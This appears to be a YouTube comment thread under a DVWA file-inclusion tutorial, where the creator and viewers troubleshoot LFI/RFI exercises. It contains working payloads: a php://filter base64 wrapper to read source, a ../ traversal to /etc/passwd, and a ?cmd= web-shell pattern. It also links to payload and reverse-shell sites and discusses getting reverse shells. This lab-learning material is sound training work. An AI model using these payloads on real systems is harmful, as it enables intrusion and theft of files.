Had a few questions about Quote 3 missing - apologies I missed this in the initial video! For anybody stuck at this point take a look at these resources: www.aptive.co.uk/blog/local-file-inclusion-lfi-testing/ highon.coffee/blog/lfi-cheat-sheet/#php-wrapper-phpfilter book.hacktricks.xyz/pentesting-web/file-inclusion#lfi-rfi-using-php-wrappers Essentially we want to read the code of fi.php, not execute it! We can use some of the PHP filter tricks from cheatsheets above to achieve this e.g. 127.0.0.1/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=../../hackable/flags/fi.php Then base64 decode the result in whatever way you prefer and see the missing quotes 😉
@johnstyl
3 жыл бұрын
i have been looking for a way to get the third quote by myself since i wanted to just cat the file with the reverse shell, but im running dvwa in docker and cant easily find php.ini, can't believe i didn't see this comment, great vid btw
@_CryptoCat
3 жыл бұрын
@@johnstyl thanks mate 🥰
@pawelk3k
Жыл бұрын
This rfi blow my head 🤯🤯 thank you for these videos!
@_CryptoCat
Жыл бұрын
🙏🥰
@f0rty7even9
2 жыл бұрын
Great video. I'm learning quite a lot. thank you for providing such information for free. For the guys asking about the hidden line 3; we got a reverse shell on the system, you can "cd" to the hackable folder and "cat" the contents of "fi.php" file. That way, you'll read the source code behind the file itself which will expose the hidden line. e.g. $ cat /var/www/html/dvwa/hackable/flags/fi.php of course, this is the full path to the file on my vm. replace the path to match your system setup :)
@jasonho2928
3 жыл бұрын
Really grateful for all your DVWA videos!!
@asaduzzamanjony9107
7 ай бұрын
26:00 It solved my issue. Thank you.
@adamflitch4681
3 жыл бұрын
worked ! thanks alot, just saved me
@thepetiteotaku
9 ай бұрын
I don't fully understand why you needed to start a Python server? Also, why can we not see the other php file when you checked port 9000, why can we only see shell.php?
@_CryptoCat
9 ай бұрын
It's been a long time since I made this *but* I might of used HTTP server to verify that the server could make an outbound connection before trying a shell, so that if the shell doesn't work we know it's likely the shell itself, rather than the server's inability to make remote connections.
@thepetiteotaku
9 ай бұрын
@_CryptoCat thank you for explaining!
@nxsaad3422
7 ай бұрын
The php function allow_url_include is not enable .what i do ?
@_CryptoCat
7 ай бұрын
IIRC the settings were covered in the intro ep, but you could also check the docs.
@nxsaad3422
7 ай бұрын
Tnx for ur reply 🥰. I fix my problem in another way
@gordonrogers8118
3 жыл бұрын
Great walk-through! What about Quote 3, though? It's still hidden.
@gordonrogers8118
3 жыл бұрын
I was able to go back to the command injection page and display the file, but I can't seem to get it using only the file inclusion.
@_CryptoCat
3 жыл бұрын
oh yeh good point! you might be able to use some tricks to read the php file source code, check this out - infinitelogins.com/2020/04/25/lfi-php-wrappers-to-obtain-source-code/
@kao9698
3 жыл бұрын
@@gordonrogers8118 just open the fi.php file when you get a shell with RFI
@steaders82
2 жыл бұрын
Hi. I'm running my dvwa as a docker. My shell.php works except for the last part /bin/sh Any ideas for docker hosted reverse scripts please 🇬🇧
@_CryptoCat
2 жыл бұрын
Hi mate, I'm not 100% sure but you probably need have the shell connect back to your docker IP address, rather than your VM IP address. If you run docker container with -it flag it should give you a shell: docs.docker.com/engine/reference/commandline/exec/
@HelloWorld-tx3xl
Жыл бұрын
It's a helpful and great video! Unfortunately, I have some questions when I tried RFI with reverse shell. Is it possible if I want your any contact method?
@_CryptoCat
Жыл бұрын
You can ask questions here if you want, they might help other people who watch the video in future 🙂
@HelloWorld-tx3xl
Жыл бұрын
@@_CryptoCat Oh no! My reply had been disappeared! KZitem...let me write down the comment, please!🥲 OK! Thank you for your reply! I run DVWA by vulnerables/web-dvwa docker, and Setup Check are both Enabled. In addition, I could successfully RFI through visiting google page. However my python http server and nc couldn't get any message, even though the PHP file is just "Hello World!". Do you have any idea or suggestion?
@_CryptoCat
Жыл бұрын
The comment was sent to the "held for review" section 🙄 Got it now! If you run DVWA within a docker container, you'll need to also run the python http server and nc inside of that docker instance (as by design, you shouldn't be able to communicate with your host OS from the container). You can run commands inside the docker with docs.docker.com/engine/reference/commandline/exec
@HelloWorld-tx3xl
Жыл бұрын
@@_CryptoCat Got it! Thank you very much! 🥰
@Kinoti9
3 жыл бұрын
Wow ! I was having trouble getting a shell back because of the contents of shell.php. I had to change those to match exactly yours. In a real world scenario the allow_url_include has to be turned on for this to work right? What if its turned off, do you know of any way to work around this? Thanks
@_CryptoCat
3 жыл бұрын
yep exactly! for PHP you would need allow_url_include enabled for RFI to work but LFI may still be possible without it. require, require_once, include and include_once are vulnerable functions so look out for these when no other form of input validation is in place 😉
@Kinoti9
3 жыл бұрын
@@_CryptoCat thanks brother always learning alot from you
@_CryptoCat
3 жыл бұрын
@@Kinoti9 🥰
@dogukanozturk7025
5 ай бұрын
Thank you @_CryptoCat :)
@pennyWise_01
2 жыл бұрын
Hey where do you get those shellp.php file I tried using msfvenom but i couldn't get any reverse shell :(
@_CryptoCat
2 жыл бұрын
Quite often I'll just use a really simple shell.php containing: Then pass the system command as a get parameter, e.g. victim.oops/?cmd=whoami For more web shells: github.com/swisskyrepo/PayloadsAllTheThings For reverse shells, this site is great: www.revshells.com 😉
@pennyWise_01
2 жыл бұрын
@@_CryptoCat Thank youuu I love your videos
@_CryptoCat
2 жыл бұрын
@@pennyWise_01 thank you 🙏🥰
@ProCook703
10 ай бұрын
word of advice. never hold the arror key to scroll liek you did in this video, it takes to long. instead do ctrl+A and ctrl+E
@_CryptoCat
10 ай бұрын
Haha yeh these shortcuts save so much time 🙌
@lo-tr2zn
2 жыл бұрын
Hey, the local file inclusion doesn't seem to work for me in lwo level. i'm trying this: "?page=../../../../../../etc/passwd" it's not working it only says no such file or directory
@_CryptoCat
2 жыл бұрын
Just to double-check, you are on Linux rather than Windows? Have you tried any other files?
@lo-tr2zn
2 жыл бұрын
@@_CryptoCat Oh yeah, i do tried other files; also i was on windows which was the main cause, i'm currently researching windows file system but if you know the alternate version of etc/passwd for windows you could tell me
@lo-tr2zn
2 жыл бұрын
hmm, seems to get a permission denied
@lo-tr2zn
2 жыл бұрын
@@_CryptoCat managed to find the etc/passwd and managed to install a reverse shell, THIS IS AWESOME!
Пікірлер: 45